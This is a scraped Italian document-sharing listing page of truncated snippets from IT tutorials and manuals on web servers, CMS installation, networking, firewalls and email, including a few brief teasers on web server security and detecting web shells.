Il web server Apache Lezione n. 3. Introduzione Procurarsi ed installare il web server Apache Introduzione In questa lezione cominciamo a fare un po di pratica facendo una serie di operazioni preliminari, necessarie per iniziare a lavorare. In particolar

Dettagli

ORIEME ITALIA SpA Viale Sarca, 45 Telefono +39 02.64.41.16.1 Orieme Italia S.p.A. I-20125 Milano Telefax +39 02.64.36.990 www.orieme.

ORIEME ITALIA SpA Viale Sarca, 45 Telefono +39 02.64.41.16.1 Orieme Italia S.p.A. I-20125 Milano Telefax +39 02.64.36.990 www.orieme. Visio Wifi Setup - Android Rev. 1.0.0 L app dedicate Android consente di trasformare il vostro device in un vero e proprio pannello di controllo remoto, e di gestire Visio Wifi in tutta libertà, in casa

Dettagli

Installazione & Configurazione Php e MySQL su Mac Os X. Php

Installazione & Configurazione Php e MySQL su Mac Os X. Php Installazione & Configurazione Php e MySQL su Mac Os X Php PHP è un linguaggio di scripting interpretato, con licenza Open Source, originariamente concepito per la realizzazione di pagine web dinamiche.

Dettagli

GENERALE. Cos è la rete IRC? Differenza tra Mirc e DeXdcc?

GENERALE. Cos è la rete IRC? Differenza tra Mirc e DeXdcc? F.A.Q. DeXdcc - Versione 1.0 GENERALE Cos è la rete IRC? IRC (Internet Relay Chat) è uno dei sistemi che ha spinto la comunicazione tramite Internet, serve per chattare in tempo reale e condividere files

Dettagli

Elementi di Sicurezza e Privatezza Laboratorio 3 - Web Server Apache (1) Chiara Braghin chiara.braghin@unimi.it!

Elementi di Sicurezza e Privatezza Laboratorio 3 - Web Server Apache (1) Chiara Braghin chiara.braghin@unimi.it! Elementi di Sicurezza e Privatezza Laboratorio 3 - Web Server Apache (1) Chiara Braghin chiara.braghin@unimi.it! Sicurezza del Web server Sicurezza Web Server (1) Perché attaccare un Web server? w Per

Dettagli

Sicurezza del Web server

Sicurezza del Web server Elementi di Sicurezza e Privatezza Laboratorio 3 - Web Server Apache (1) Chiara Braghin chiara.braghin@unimi.it! Sicurezza del Web server 1 Sicurezza Web Server (1) Perché attaccare un Web server? w Per

Dettagli

Innanzitutto andiamo sul sito http://www.dropbox.com/ ed eseguiamo il download del programma cliccando su Download Dropbox.

Innanzitutto andiamo sul sito http://www.dropbox.com/ ed eseguiamo il download del programma cliccando su Download Dropbox. Oggi parlerò di qualcosa che ha a che fare relativamente con la tecnica fotografica, ma che ci può dare una mano nella gestione dei nostri archivi digitali, soprattutto nel rapporto professionale con altre

Dettagli

Come installare e configurare il software FileZilla

Come installare e configurare il software FileZilla Come utilizzare FileZilla per accedere ad un server FTP Con questo tutorial verrà mostrato come installare, configurare il software e accedere ad un server FTP, come ad esempio quello dedicato ai siti

Dettagli

MANUALE D USO Agosto 2013

MANUALE D USO Agosto 2013 MANUALE D USO Agosto 2013 Descrizione generale MATCHSHARE è un software per la condivisione dei video e dati (statistiche, roster, ) delle gare sportive. Ogni utente abilitato potrà caricare o scaricare

Dettagli

2.1 Installazione e configurazione LMS [4]

2.1 Installazione e configurazione LMS [4] 2.1 Installazione e configurazione LMS [4] Prerequisti per installazione su server: Versione PHP: 4.3.0 o superiori (compatibilità a php5 da versione 3.0.1) Versione MySql 3.23 o superiori Accesso FTP:

Dettagli

ISTRUZIONI PASSO PASSO PER CREARE UN SITO CON JOOMLA SU ALTERVISTA

ISTRUZIONI PASSO PASSO PER CREARE UN SITO CON JOOMLA SU ALTERVISTA ISTRUZIONI PASSO PASSO PER CREARE UN SITO CON JOOMLA SU ALTERVISTA REGISTRARSI AL SITO ALTERVISTA, PER OTTENERE SPAZIO WEB GRATUITO o Andare sul sito it.altervista.org o Nel riquadro al centro, scrivere

Dettagli

Il File System. È la componente del S.O. che si occupa della gestione della memoria di massa e dell organizzazione logica dei dati

Il File System. È la componente del S.O. che si occupa della gestione della memoria di massa e dell organizzazione logica dei dati Il File System È la componente del S.O. che si occupa della gestione della memoria di massa e dell organizzazione logica dei dati Le operazioni supportate da un file system sono: eliminazione di dati modifica

Dettagli

SARA. Software per scansioni

SARA. Software per scansioni SARA Software per scansioni Introduzione: perché le scansioni I sistemi operativi installano servizi che non si usano Non tutti sanno cosa sta girando sul proprio calcolatore Non tutti sanno su quali porte

Dettagli

Applicazioni web centrati sui dati (Data-centric web applications)

Applicazioni web centrati sui dati (Data-centric web applications) Applicazioni web centrati sui dati (Data-centric web applications) 1 ALBERTO BELUSSI ANNO ACCADEMICO 2009/2010 WEB La tecnologia del World Wide Web (WWW) costituisce attualmente lo strumento di riferimento

Dettagli

Tratte da (18. TECNICHE DI ACCESSO AI DATABASE IN AMBIENTE INTERNET)

Tratte da (18. TECNICHE DI ACCESSO AI DATABASE IN AMBIENTE INTERNET) Tratte da (18. TECNICHE DI ACCESSO AI DATABASE IN AMBIENTE INTERNET) Ipotesi di partenza: concetti di base del networking Le ipotesi di partenza indispensabili per poter parlare di tecniche di accesso

Dettagli

INSTALLAZIONE JOOMLA

INSTALLAZIONE JOOMLA INSTALLAZIONE JOOMLA Moltissime volta mi capita (e penso capiti anche a voi) di dover prima di pubblicare un sito farlo vedere al cliente per l ok finale, o magari doverlo fare vedere, ma non avere ancora

Dettagli

Introduzione all elaborazione di database nel Web

Introduzione all elaborazione di database nel Web Introduzione all elaborazione di database nel Web Prof.ssa M. Cesa 1 Concetti base del Web Il Web è formato da computer nella rete Internet connessi fra loro in una modalità particolare che consente un

Dettagli

Questo punto richiederebbe uno sviluppo molto articolato che però a mio avviso va al di là delle possibilità fornite al candidato dal tempo a disposizione. Mi limiterò quindi ad indicare dei criteri di

Dettagli

Database e reti. Piero Gallo Pasquale Sirsi

Database e reti. Piero Gallo Pasquale Sirsi Database e reti Piero Gallo Pasquale Sirsi Approcci per l interfacciamento Il nostro obiettivo è, ora, quello di individuare i possibili approcci per integrare una base di dati gestita da un in un ambiente

Dettagli

Parte II: Reti di calcolatori Lezione 9

Parte II: Reti di calcolatori Lezione 9 Università di Roma Tor Vergata Corso di Laurea triennale in Informatica Sistemi operativi e reti A.A. 2013-14 Pietro Frasca Parte II: Reti di calcolatori Lezione 9 Martedì 1-04-2014 1 Applicazioni P2P

Dettagli

LEZIONE 3. Il pannello di amministrazione di Drupal, configurazione del sito

LEZIONE 3. Il pannello di amministrazione di Drupal, configurazione del sito LEZIONE 3 Il pannello di amministrazione di Drupal, configurazione del sito Figura 12 pannello di controllo di Drupal il back-end Come già descritto nella lezione precedente il pannello di amministrazione

Dettagli

Individuare Web Shell nocive con PHP Shell

Individuare Web Shell nocive con PHP Shell http://www.readability.com/articles/7e9rlg94 html.it ORIGINAL PAGE Individuare Web Shell nocive con PHP Shell Detector by ANDREA DRAGHETTI Una shell Web è uno script, comunemente scritto in PHP, in grado

Dettagli

INDICE PROGRAMMA CORSO

INDICE PROGRAMMA CORSO INDICE PROGRAMMA CORSO PRIMA LEZIONE: Componenti di un computer: Hardware, Software e caratteristiche delle periferiche. SECONDA LEZIONE: Elementi principali dello schermo di Windows: Desktop, Icone, Mouse,

Dettagli

Manuale d uso e manutenzione (client Web e Web services)

Manuale d uso e manutenzione (client Web e Web services) Manuale d uso e manutenzione (client Web e Web services) Rev. 01-15 ITA Versione Telenet 2015.09.01 Versione DB 2015.09.01 ELECTRICAL BOARDS FOR REFRIGERATING INSTALLATIONS 1 3232 3 INSTALLAZIONE HARDWARE

Dettagli

Componenti Web: client-side e server-side

Componenti Web: client-side e server-side Componenti Web: client-side e server-side side Attività di applicazioni web Applicazioni web: un insieme di componenti che interagiscono attraverso una rete (geografica) Sono applicazioni distribuite logicamente

Dettagli

PER FARE UN SITO INTERNET

PER FARE UN SITO INTERNET Diocesi Brescia Corso per animatori della Cultura e della Comunicazione PER FARE UN SITO INTERNET I diversi modelli di siti Internet. Dove e come pubblicarlo. INTERNET Rete di computer mondiale ad accesso

Dettagli

Installare Drupal7 su Altervista e non solo

Installare Drupal7 su Altervista e non solo Installare Drupal7 su Altervista e non solo This opera is published under a Creative Commons License. www.glider.altervista.org lukadg@gmail.com Guida per installare Drupal7 su Altervista. Questa guida

Dettagli

Siti web centrati sui dati (Data-centric web applications)

Siti web centrati sui dati (Data-centric web applications) Siti web centrati sui dati (Data-centric web applications) 1 A L B E R T O B E L U S S I A N N O A C C A D E M I C O 2 0 1 2 / 2 0 1 3 WEB La tecnologia del World Wide Web (WWW) costituisce attualmente

Dettagli

3. Installare Wamp Server

3. Installare Wamp Server E107 WEB SYSTEM Corso on line di progettazione siti dinamici: livello base R E A L I Z Z A Z I O N E D I 3. Installare Wamp Server By e107 Italian Team Sito web:http://www.e107italia.org Contatto: admin@e107italia.org

Dettagli

Esercitazione 8. Basi di dati e web

Esercitazione 8. Basi di dati e web Esercitazione 8 Basi di dati e web Rev. 1 Basi di dati - prof. Silvio Salza - a.a. 2014-2015 E8-1 Basi di dati e web Una modalità tipica di accesso alle basi di dati è tramite interfacce web Esiste una

Dettagli

Xampp. Valeriano Maysonnave - A.A. 2014/2015 -

Xampp. Valeriano Maysonnave - A.A. 2014/2015 - Xampp Valeriano Maysonnave - A.A. 2014/2015-1 Introduzione...1 2 Installazione su Windows...1 3 Configurazione Apache...2 3.1 Accesso al file di configurazione httpd.conf...2 3.2 Il file httpd.conf...3

Dettagli

SOMMARIO. 1 ISTRUZIONI DI BASE. 2 CONFIGURAZIONE. 7 STORICO. 9 EDITOR HTML. 10 GESTIONE ISCRIZIONI E CANCELLAZIONI. 11 GESTIONE MAILING LIST.

SOMMARIO. 1 ISTRUZIONI DI BASE. 2 CONFIGURAZIONE. 7 STORICO. 9 EDITOR HTML. 10 GESTIONE ISCRIZIONI E CANCELLAZIONI. 11 GESTIONE MAILING LIST. INDICE 1) SOMMARIO... 1 2) ISTRUZIONI DI BASE... 2 3) CONFIGURAZIONE... 7 4) STORICO... 9 5) EDITOR HTML... 10 6) GESTIONE ISCRIZIONI E CANCELLAZIONI... 11 7) GESTIONE MAILING LIST... 12 8) E-MAIL MARKETING...

Dettagli

Servizi Remoti. Servizi Remoti. TeamPortal Servizi Remoti

Servizi Remoti. Servizi Remoti. TeamPortal Servizi Remoti 20120300 INDICE 1. Introduzione... 3 2. Consultazione... 4 2.1 Consultazione Server Fidati... 4 2.2 Consultazione Servizi Client... 5 2.3 Consultazione Stato richieste... 5 3. Amministrazione... 6 3.1

Dettagli

Esistono sostanzialmente due metodi per inserire un video online (preso da siti di video sharing come Youtube) in un powerpoint slideshow :

Esistono sostanzialmente due metodi per inserire un video online (preso da siti di video sharing come Youtube) in un powerpoint slideshow : Arricchire con contenuti multimediali uno slideshow di Powerpoint, sia per fare presentazioni a carattere professionale, didattico o per presentare una tesi-relazione, in determinate circostanze può veramente

Dettagli

HORIZON SQL CONFIGURAZIONE DI RETE

HORIZON SQL CONFIGURAZIONE DI RETE 1-1/9 HORIZON SQL CONFIGURAZIONE DI RETE 1 CARATTERISTICHE DI UN DATABASE SQL...1-2 Considerazioni generali... 1-2 Concetto di Server... 1-2 Concetto di Client... 1-2 Concetto di database SQL... 1-2 Vantaggi...

Dettagli

Esempi pratici, risultati e contromisure consigliate. Massimo Biagiotti

Esempi pratici, risultati e contromisure consigliate. Massimo Biagiotti L attività di un Ethical Hacker Esempi pratici, risultati e contromisure consigliate Massimo Biagiotti Information Technology > Chiunque operi nel settore sa che il panorama dell IT è in continua evoluzione

Dettagli

Apache 2, PHP5, MySQL 5

Apache 2, PHP5, MySQL 5 Installazione di Apache 2, PHP5, MySQL 5 Corso Interazione Uomo Macchina AA 2005/2006 Installazione e Versioni Considerazione le versioni più recenti dei vari software così da poterne sperimentare le caratteristiche

Dettagli

Posta Elettronica. Comunicare con e-mail. Definizione di e-mail. metodo di trasmissione dei messaggi tramite Internet:

Posta Elettronica. Comunicare con e-mail. Definizione di e-mail. metodo di trasmissione dei messaggi tramite Internet: Posta Elettronica Comunicare con e-mail Definizione di e-mail Def) La posta elettronica è un metodo di trasmissione dei messaggi tramite Internet: serve a comunicare per iscritto con gli altri utenti della

Dettagli

L archiviazione della posta elettronica può aiutarci a recuperare spazio senza costringerci a cestinare documenti importanti

L archiviazione della posta elettronica può aiutarci a recuperare spazio senza costringerci a cestinare documenti importanti L archiviazione della posta elettronica può aiutarci a recuperare spazio senza costringerci a cestinare documenti importanti Potete immaginare un ufficio senza archivio? Sarebbe un inferno. Dover rintracciare

Dettagli

MyFRITZ!, Dynamic DNS e Accesso Remoto

MyFRITZ!, Dynamic DNS e Accesso Remoto MyFRITZ!, Dynamic DNS e Accesso Remoto 1 Introduzione In questa mini-guida illustreremo come accedere da Internet al vostro FRITZ!Box in ufficio o a casa, quando siete in mobilità o vi trovate in luogo

Dettagli

UBUNTU: gli strumenti di condivisione risorse

UBUNTU: gli strumenti di condivisione risorse UBUNTU: gli strumenti di condivisione risorse condivisione 1o1 a cura di Danio Campolunghi La condivisione di risorse Verranno qui proposti gli strumenti grafici di serie messi a disposizione da Ubuntu

Dettagli

Windows Vista, il nuovo sistema operativo Microsoft che cerca le giuste risposte ai quesiti di sicurezza

Windows Vista, il nuovo sistema operativo Microsoft che cerca le giuste risposte ai quesiti di sicurezza Windows Vista, il nuovo sistema operativo Microsoft che cerca le giuste risposte ai quesiti di sicurezza Microsoft Windows è il sistema operativo più diffuso, ma paradossalmente è anche quello meno sicuro.

Dettagli

Corso Web programming

Corso Web programming Corso Web programming Modulo T3 A1 Modelli di programmazione 1 Prerequisiti Concetto di rete Processi e thread Concetti generali sui database 2 1 Introduzione Un particolare ambito della programmazione

Dettagli

Apache Monitoring con MRTG

Apache Monitoring con MRTG Apache Monitoring con MRTG Mi è capitato di dover monitorare il carico di lavoro di Apache, per rendermi conto dell effettivo sfruttamento delle risorse di sistema. Avevo in alcuni casi un decremento delle

Dettagli

NOTE TECNICHE DI CONFIGURAZIONE. Giugno 2009

NOTE TECNICHE DI CONFIGURAZIONE. Giugno 2009 NOTE TECNICHE DI CONFIGURAZIONE Giugno 2009 INDICE Configurazioni 3 Configurazioni Windows Firewall.. 3 Configurazioni Permessi DCOM. 4 Installazione Sql Server 2005 9 Prerequisiti Software 7 Installazione

Dettagli

Comandi di Rete. Principali Comandi di Rete. Verificare, testare ed analizzare da Riga di Comando

Comandi di Rete. Principali Comandi di Rete. Verificare, testare ed analizzare da Riga di Comando Comandi di Rete Principali Comandi di Rete. Verificare, testare ed analizzare da Riga di Comando PING: verifica la comunicazione tra due pc Il comando ping consente di verificare la connettività a livello

Dettagli

Sviluppo siti e servizi web Programmi gestionali Formazione e Consulenza Sicurezza informatica Progettazione e realizzazione di reti aziendali

Sviluppo siti e servizi web Programmi gestionali Formazione e Consulenza Sicurezza informatica Progettazione e realizzazione di reti aziendali 1 Caratteristiche generali Nati dall esperienza maturata nell ambito della sicurezza informatica, gli ECWALL di e-creation rispondono in modo brillante alle principali esigenze di connettività delle aziende:

Dettagli

Installazione LEGGI E STUDIA IL TUO LIBRO DIGITALE! In questa breve guida scoprirai come:

Installazione LEGGI E STUDIA IL TUO LIBRO DIGITALE! In questa breve guida scoprirai come: GUIDA AL LIBRO DIGITALE Installazione LEGGI E STUDIA IL TUO LIBRO DIGITALE! In questa breve guida scoprirai come: ottenere un account Giunti Scuola installare il Dbook scaricare i tuoi libri digitali Scarica

Dettagli

La VPN con il FRITZ!Box Parte I. La VPN con il FRITZ!Box Parte I

La VPN con il FRITZ!Box Parte I. La VPN con il FRITZ!Box Parte I La VPN con il FRITZ!Box Parte I 1 Introduzione In questa mini-guida illustreremo come realizzare un collegamento tramite VPN(Virtual Private Network) tra due FRITZ!Box, in modo da mettere in comunicazioni

Dettagli

Scritto da Administrator Martedì 09 Settembre 2008 12:57 - Ultimo aggiornamento Domenica 12 Giugno 2011 00:48

Scritto da Administrator Martedì 09 Settembre 2008 12:57 - Ultimo aggiornamento Domenica 12 Giugno 2011 00:48 Sommario - Introduzione - Un modo migliore... - Tunnel auto-terminante - Ulteriori accorgimenti - Note Introduzione Il seguente articolo dovrebbe aiutare chiunque fosse interessato alla sicurezza nelle

Dettagli

INSTALLAZIONE JOOMLA SU SPAZIO WEB FREE ALTERVISTA

INSTALLAZIONE JOOMLA SU SPAZIO WEB FREE ALTERVISTA INSTALLAZIONE JOOMLA SU SPAZIO WEB FREE ALTERVISTA Questa vuole essere una breve tutorial su come installare Joomla su uno spazio Web gratuito, in particolare faremo riferimento ai sottodomini gratuitamente

Dettagli

iguard GPRS - Manuale tecnico -

iguard GPRS - Manuale tecnico - iguard GPRS - Manuale tecnico - Introduzione: Questo manuale spiega come impostare l'iguard ed il PC per la trasmissione dei dati tramite la rete GPRS. Materiale necessario: Dispositivo iguard con porta

Dettagli

E' sempre valido il comando che si usa anche con Outlook Express e con Windows Mail: shift più control più V.

E' sempre valido il comando che si usa anche con Outlook Express e con Windows Mail: shift più control più V. Microsoft Outlook 2007. Di Nunziante Esposito. `*************` Decima ed ultima parte: Varie. `***********` Dopo aver impostato al meglio le opzioni ed il layout di questo browser, e dopo le indicazioni

Dettagli

GUIDA ALLA CONFIGURAZIONE DI ZONE ALARM PERSONAL FIREWALL

GUIDA ALLA CONFIGURAZIONE DI ZONE ALARM PERSONAL FIREWALL GUIDA ALLA CONFIGURAZIONE DI ZONE ALAR M PERSONAL FIREWALL 6.1 Zone Alarm personal Firewall è la versione gratuita, per uso personale, del più completo Zone Alarm Pro, firewall prodotto da Zone Labs. Questa

Dettagli

Ultr@ VNC: Guida (parte 1)

Ultr@ VNC: Guida (parte 1) Ultr@ VNC: Guida (parte 1) Vi presento la guida in italiano per l installazione e l utilizzo di Ultra VNC :http://ultravnc.sourceforge.net. Le potenzialità del programma ve le abbiamo già presentate :http://www.femetal.it/9/ultravncrecensione,

Dettagli

Manuale per il cliente finale

Manuale per il cliente finale Manuale per il cliente finale versione 1.6-r1 Indice 1 Cos è Confixx? - Generalità 4 1.1 Login................................ 4 1.2 Ritardi temporali delle impostazioni.............. 5 2 Settori della

Dettagli

Sommario. Introduzione ai firewall. Firewall a filtraggio dei pacchetti. Il firewall ipfw. Definizione e scopo Classificazione

Sommario. Introduzione ai firewall. Firewall a filtraggio dei pacchetti. Il firewall ipfw. Definizione e scopo Classificazione Sesta Esercitazione Sommario Introduzione ai firewall Definizione e scopo Classificazione Firewall a filtraggio dei pacchetti Informazioni associate alle regole Interpretazione delle regole Il firewall

Dettagli

Il firewall ipfw. Introduzione ai firewall. Problema: sicurezza di una rete. Definizione di firewall. Introduzione ai firewall

Il firewall ipfw. Introduzione ai firewall. Problema: sicurezza di una rete. Definizione di firewall. Introduzione ai firewall Il firewall ipfw Introduzione ai firewall classificazione Firewall a filtraggio dei pacchetti informazioni associate alle regole interpretazione delle regole ipfw configurazione impostazione delle regole

Dettagli

Corso GNU/Linux - Lezione 6. Davide Giunchi - davidegiunchi@libero.it

Corso GNU/Linux - Lezione 6. Davide Giunchi - davidegiunchi@libero.it Corso GNU/Linux - Lezione 6 Davide Giunchi - davidegiunchi@libero.it Riepilogo TCP/IP Ogni host nella rete deve avere un proprio indirizzo ip Due o piu computer nella stessa rete, per poter comunicare

Dettagli

Client - Server. Client Web: il BROWSER

Client - Server. Client Web: il BROWSER Client - Server Client Web: il BROWSER Il client Web è un applicazione software che svolge il ruolo di interfaccia fra l utente ed il WWW, mascherando la complessità di Internet. Funzioni principali Inviare

Dettagli

Classificazione del software

Classificazione del software Classificazione del software Classificazione dei software Sulla base del loro utilizzo, i programmi si distinguono in: SOFTWARE Sistema operativo Software applicativo Sistema operativo: una definizione

Dettagli

Morret Mobile Robot Remote Tunneling

Morret Mobile Robot Remote Tunneling UNIVERSITÀ DI BRESCIA FACOLTÀ DI INGEGNERIA Dipartimento di Elettronica per l Automazione Laboratorio di Robotica Avanzata Advanced Robotics Laboratory Corso di Robotica (Prof. Riccardo Cassinis) Morret

Dettagli

12.5 UDP (User Datagram Protocol)

12.5 UDP (User Datagram Protocol) CAPITOLO 12. SUITE DI PROTOCOLLI TCP/IP 88 12.5 UDP (User Datagram Protocol) L UDP (User Datagram Protocol) é uno dei due protocolli del livello di trasporto. Come l IP, é un protocollo inaffidabile, che

Dettagli

Architetture Web a tre livelli: CGI, SSI, ISAPI e codice mobile Architetture a 3 livelli (1)

Architetture Web a tre livelli: CGI, SSI, ISAPI e codice mobile Architetture a 3 livelli (1) Pagina 1 di 10 Architetture Web a tre livelli: CGI, SSI, ISAPI e codice mobile Architetture a 3 livelli (1) Nel corso della lezione precedente abbiamo analizzato le caratteristiche dell'architettura CGI.

Dettagli

MDaemon e Outlook Connector for MDaemon

MDaemon e Outlook Connector for MDaemon MDaemon e Outlook Connector for MDaemon Introduzione...2 Cos'è il groupware...2 Che cosa significa groupware?...2 Cos è WorldClient...2 MDaemon e l evoluzione delle funzionalità groupware...3 Nuove funzionalità

Dettagli

Start > Pannello di controllo > Prestazioni e manutenzione > Sistema Oppure clic destro / Proprietà sull icona Risorse del computer su Desktop

Start > Pannello di controllo > Prestazioni e manutenzione > Sistema Oppure clic destro / Proprietà sull icona Risorse del computer su Desktop Installare e configurare una piccola rete locale (LAN) Usando i Protocolli TCP / IP (INTRANET) 1 Dopo aver installato la scheda di rete (seguendo le normali procedure di Aggiunta nuovo hardware), bisogna

Dettagli

Il software del PC. Il BIOS

Il software del PC. Il BIOS Il software del PC La parola software è un neologismo che è stato coniato in contrapposizione all hardware (ferraglia). L hardware si può prendere a calci, contro il software si può solo imprecare. Il

Dettagli

Mausoleo COMUNE DI NUORO PROGETTO PER LA REALIZZAZIONE DEL CIMITERO MULTIMEDIALE. Arch.Marco Cerina Ing.Enrico Dini

Mausoleo COMUNE DI NUORO PROGETTO PER LA REALIZZAZIONE DEL CIMITERO MULTIMEDIALE. Arch.Marco Cerina Ing.Enrico Dini COMUNE DI NUORO D O C U M E N T O D I S P E C I F I C A P E R I L P R O D O T T O Mausoleo PROGETTO PER LA REALIZZAZIONE DEL CIMITERO MULTIMEDIALE Arch.Marco Cerina Ing.Enrico Dini Descrizione introduttiva

Dettagli

1. La rete wireless per noi.

1. La rete wireless per noi. 1. La rete wireless per noi. Stiamo allestendo un servizio di rete wireless esteso per quanto possibile a tutto il Dipartimento. Per cominciare le antenne sono state disposte nei luoghi in cui è più difficile

Dettagli

V 1.00b. by ReBunk. per suggerimenti e critiche mi trovate nell hub locarno.no-ip.org. Guida di base IDC ++1.072

V 1.00b. by ReBunk. per suggerimenti e critiche mi trovate nell hub locarno.no-ip.org. Guida di base IDC ++1.072 V 1.00b by ReBunk per suggerimenti e critiche mi trovate nell hub locarno.no-ip.org Guida di base IDC ++1.072 Thanks To SicKb0y (autore del idc++) staff (per sopportarmi tutti i giorni) Versione definitiva

Dettagli

41126 Cognento (MODENA) Italy Via Bottego 33/A Tel: +39-(0)59 346441 Internet: http://www.aep.it E-mail: aep@aep.it Fax: +39-(0)59-346437

41126 Cognento (MODENA) Italy Via Bottego 33/A Tel: +39-(0)59 346441 Internet: http://www.aep.it E-mail: aep@aep.it Fax: +39-(0)59-346437 QUICK ANALYZER Manuale Operativo Versione 5.3 Sommario 1.0 Generalità... 2 CONTRATTO DI LICENZA... 3 2.0 Configurazione dei Canali... 4 2.1 Gestione DataLogger IdroScan... 7 3.0 Risultati di Prova... 9

Dettagli

A questo punto avremo la cartella dello script apriamola e cerchiamo il mirc.exe.

A questo punto avremo la cartella dello script apriamola e cerchiamo il mirc.exe. Guida a [red-mirc].avviare Lo Script Dopo aver scaricato lo script, estraiamolo in una directory del nostro pc, in tal modo tutte le modifiche e personalizzazioni che apporteremo saranno salvate per i

Dettagli